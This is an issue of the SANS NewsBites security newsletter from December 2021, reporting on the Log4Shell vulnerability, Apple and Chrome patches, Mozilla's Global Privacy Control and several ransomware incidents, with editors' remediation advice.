SANS NewsBites

Need for Prioritized Remediation of Log4Shell Vulnerabilities Will Remain Critical; Mozilla Advances Browser Global Privacy Control; Patching Needed for Critical Vulnerabilities Across Apple iOS and iPadOS Devices

December 14, 2021  |  Volume XXIII - Issue #97

Top of the News


2021-12-13

CISA Adds Log4J to Catalog of Known Exploited Vulnerabilities

In a statement over the weekend, Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly said, “We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies -- and signals to non-federal partners -- to urgently patch or remediate this vulnerability.” GitHub’s list includes hundreds of affected services with links to each service’s security advisory.

Editor's Note

CVE-2021-44228, or log4shell as the vulnerability has been named, has kept us all pretty busy this weekend. We have only seen the beginning of what will be a vast effort to protect from this vulnerability. Most attacks are currently attempting to very simply “spray” the exploit string into frequently logged fields. Over time, attackers will get better at targeting specific software packages. We have seen a bit of this with VMware vCenter. Affected security tools present a huge target attackers will not miss to exploit. Dealing with log4shell, make sure to preserve your notes. History has shown that once a high profile vulnerability like this is found, people will look for similar issues in other tools, and also take a deeper look at the affected library. JNDI is not unique to log4j and a well-known issue. Another "lesson learned" of this still evolving incident: Secure configurations matter. The vulnerability may be mitigated by disabling the risky JNDI feature, and it looks like log4j will start shipping with it disabled by default. But for now: patch... patch... patch...

Johannes Ullrich
Johannes Ullrich

If you’re using Log4J 1.x, it is no longer supported, and you need to move to Log4j 2. Update to at least Log4J 2.16. Even so, you need to take actions to ensure you’re secure. Enumerate your externally facing devices with log4j installed, make sure your SOC is monitoring all the alerts from them and configure a WAF to reduce the attack surface and volume of alerts. If you have applications developed in Java and you have been contemplating migrating them to another technology you may want to execute that plan, particularly if you no longer have your Java expertise.

Lee Neely
Lee Neely

What makes this vulnerability so unique is just how ubiquitous it is (if your system, application or device is logging it could be vulnerable) but what is also unique is the attack surface. For this attack you are not remotely connecting to a specific port for a specific application, instead you are attacking any input that logs that input, such as connections to a Webserver, email filtering, etc. For an excellent overview of the attack and defenses, check out the webcast by SANS and instructors. https://www.youtube.com/watch?v=oC2PZB5D3Ys

Lance Spitzner
Lance Spitzner

2021-12-13

Log4Shell Exploit is Going to be Around for a Long Time

The US Cybersecurity and Infrastructure Security Agency (CISA) estimates that there are hundreds of millions of devices that are vulnerable to Log4Shell. Rob Joyce said that “The log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA’s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.” Jake Williams said that “if you're patching #log4j today on an Internet facing service, you need to be doing an incident response too. The reality is that someone else almost certainly beat you to it. Patching doesn't remove the existing compromise.”

Editor's Note

When Log4j was introduced, it provided visibility and logging capabilities to our Java applications and services which we all leveraged and it is now included in many packages and distributions, meaning you’re going to have to work to make sure that it’s updated everywhere, particularly where embedded and you’re reliant on a third-party update. You need to take active steps to monitor and protect yourself, as well as verify you’re not already compromised. When you’re done updating, don’t turn off the monitoring.

Lee Neely
Lee Neely

It’s also important to note that if you scan for this vulnerability and discover your system is patched, make sure it was you who applied that patch. Criminals are known to patch systems they compromise to prevent others from doing the same.

Brian Honan
Brian Honan

2021-12-10

Mozilla Global Privacy Control Now Available to All Users

Mozilla has made Global Privacy Control (GPC) to all users; the specification was browser setting was rolled out on a limited basis earlier this fall. GPC tells websites not to share your personal data. The European Union’s General Data Protection Regulation (GDPR) requires GPC, but just two US states – Colorado and California – have laws that allow GPC enforcement.

Editor's Note

Consumer demand for increased privacy online is becoming more important to many businesses than regulatory pressure. Many software architects at consumer-facing software companies are seeing support for privacy as one of their high priority product requirements, not something security or legal teams are jamming in. As browser software vendors, Google and Mozilla are the initial touchpoint for those demands from consumers and they are both doing a good job of raising the bar on protecting users and their data.

John Pescatore
John Pescatore

This allows the browser to send a GPC opt-out signal to the far-end web site, but that web site has to have implemented code to respond to that signal, which is unlikely in areas where the legislation doesn’t apply. (E.g., not in California, Colorado, or the EU.) As this control expects the web server to have implemented controls, even when we see widespread adoption of response to GPC signals, it’s not clear this will truly be effective privacy control.

Lee Neely
Lee Neely

2021-12-13

Apple Releases Updates for Multiple OSes

Apple has released updates for multiple operating systems, including macOS, iOS, watchOS, iPadOS, and tvOS. The new iOS and iPadOS updates address 42 CVEs and adding new features including Apple Music Voice Plan, “App Privacy Report” and new “communication safety” settings intended to notify parents when their children receive or send photos that contain nudity.

Editor's Note

The iOS, iPadOS, watchOS, tvOS and HomePod updates fix numerous RCE, Information Disclosure and Privilege Escalation flaws. You’ll want to push this out before the holidays. The new iOS App Privacy Report (in settings under Privacy) shows which apps are accessing which sensitive items like photos, contacts, and location as well as network activity. Use this to make sure that you don’t have untended access and adjust permissions accordingly. The communication safety settings are under the Screen Time settings group and can be controlled via a separate passcode. Screen Time settings can also be shared across devices. The service is, by default, not enabled.

Lee Neely
Lee Neely

While well intentioned, the "communication safety" mechanism is likely to produce unintended consequences.

William Hugh Murray
William Hugh Murray

Read more in


2021-12-15

SANS Holiday Hack Challenge

The most festive cyber security challenge and virtual conference of the year, the SANS Holiday Hack Challenge, has officially opened for play!

Complete a series of FREE super fun, high-quality, hands-on cybersecurity challenges to help Santa save the whole holiday season from treachery. This year, we're back at Santa’s castle, but our familiar foe Jack Frost is back at his shenanigans, too. There’s a big new structure next door and talk of a new conference competing with KringleCon.

All ages and skill levels are welcome! We've got some whimsical and wonderful challenges and KringleCon talks to help you build critical cyber security skills to make the world a safer, more secure place. Enjoy yourself at the conference and make sure you check out our new holiday music soundtrack, too.

The Rest of the Week's News


2021-12-13

Log4Shell Vulnerability is Being Actively Scanned for and Exploited

Attackers are scanning the Internet for vulnerable instances of Log4j. The vulnerability has been exploited to deploy ransomware and coin miners.

Editor's Note

I am always fascinated by what is done with an exploit. One hopes you’d detect the impact of a crypto miner immediately, but what about other anomalous behavior? Ask yourself if you have enough information about what normal is to detect changes. There are multiple lists of Log4Shell IOCs, there is a free one on GitHub you can leverage. https://github.com/curated-intel/Log4Shell-IOCs

Lee Neely
Lee Neely

2021-12-13

Ransomware Attack Hits Kronos

Kronos Private Cloud has been hit with a ransomware attack and has taken its private cloud services offline. The company is advising its customers to use “alternative business continuity protocols” until the issue is resolved. Kronos provides cloud-based solutions for workforce management and human resources.

Editor's Note

One of the services provided by Kronos is running payroll on behalf of their clients, this service has also been impacted. Have you considered in your BCP how your organization would manage its payroll in the event of those systems being disrupted? If not, now is the time to look into that.

Brian Honan
Brian Honan

Did you fully account for your HR or other workforce systems being offline for several weeks in your continuity of operations (COOP) plan? While the timing is never good to enact your continuity plan, the holidays this month and next provide options for time accounting which may make it easier to bridge that gap, you’re going to want to tabletop all workforce management actions to see what has to wait and what has a workaround.

Lee Neely
Lee Neely

While the vendor's advice to "implement alternative business continuity protocols" may seem trite, business continuity planning is absolutely still a thing – even though we've pushed so much to SaaS/PaaS/etc. Thousands of healthcare, law enforcement, and retail organizations are whipping up Excel sheets this week to keep up operations. You always need a Plan B! Be sure to include any single point of failure in your tabletop exercises.

Christopher Elgee
Christopher Elgee

2021-12-13

Report: Irish Health Service Executive Ransomware Attack

According to a report from PWC, the ransomware attack that shut down the Irish Health Service Executive (HSE) last spring gained initial access through a phishing email. The Independent Post Incident Review says that HSE invoked its critical Incident Process once it became aware of the situation.

Editor's Note

This report from PWC is an excellent read for anyone involved in cybersecurity with lessons and recommendations that many organizations should take on board. Huge kudos to the HSE for publishing this report even though they were not required to do so. Open and transparent sharing of post incident reports is a key tool in us all ensuring the security and safety of our systems and the Internet.

Brian Honan
Brian Honan

This report describes factors and warning signs that were missed. Look at these to see if you’ve have missed anything. Is your endpoint-protection/anti-malware service in active blocking mode? Do you have any legacy operating systems? If so, how are you protecting them? Is your network protected from them? Are you only focused on user endpoints for security or are you including servers – particularly domain controllers? Specialized servers like these are good candidates for explicit allow and deny execution controls. How is your segmentation? Is it still intact, or has it been weakened by many exceptions? Be sure to look at resources in your sector ISOC, CISA, etc. which can provide assistance/expertise to help your budget and resources go further.

Lee Neely
Lee Neely

2021-12-13

Chrome Update Addresses Zero-Day

Google has pushed out an update for Chrome to fix a high-severity after free issue in the Chrome V8 JavaScript engine vulnerability that is being actively exploited. In all, the newest version of Chrome comprises fixes for five security issues; four are high severity and one is deemed critical. Chrome 96.0.4664.110 for Windows, Mac, and Linux will roll out over the next weeks.

Editor's Note

When the update is pushed Chrome has to be relaunched, monitor to make sure that happens within an acceptable window if you’re not stopping Chrome when deploying the update. While the update is scheduled to be released over a few weeks, double check to see if you can’t already download the updated version for your clients.

Lee Neely
Lee Neely

2021-12-10

CISA Warns of Flaw in Hillrom Cardio Products

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an ICS Medical Advisory regarding a vulnerability in Hillrom Welch Allyn Cardio products. The authentication bypass vulnerability affects multiple versions of several products when configured to use single sign-on.

Editor's Note

Until Hillrom updates are released and deployed, disable SSO on those products, ensure you’re isolating them from the business network and other systems, only allowing access by authorized systems and users, to include not exposing them directly to the Internet.

Lee Neely
Lee Neely

2021-12-13

Hellmann Working to Recover from Cyberattack

Hellmann Worldwide Logistics is recovering from a cyberattack. The company isolated its central data center after realizing its network was under attack. As of 4pm ET Monday afternoon, the company’s latest update says “[Our] business operations are largely running again and we are confident that we can eliminate remaining restrictions soon to be operating at full capacity again.”

Internet Storm Center Tech Corner

Log4Shell Becoming Part of the Day to Day Grind

https://isc.sans.edu/forums/diary/Log4Shell+exploited+to+implant+coin+miners/28124/

https://www.youtube.com/watch?v=oC2PZB5D3Ys


Remote Code Execution in log4j2

https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/


Log4j2/Log4Shell Followup: What we see and how to defend and how to access our data

https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/


Log4j Zero Day

https://www.lunasec.io/docs/blog/log4j-zero-day/


Log4Shell Vendor Bulletins

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592


Google Chrome Update

https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html


Malicious PyPi Packages

https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2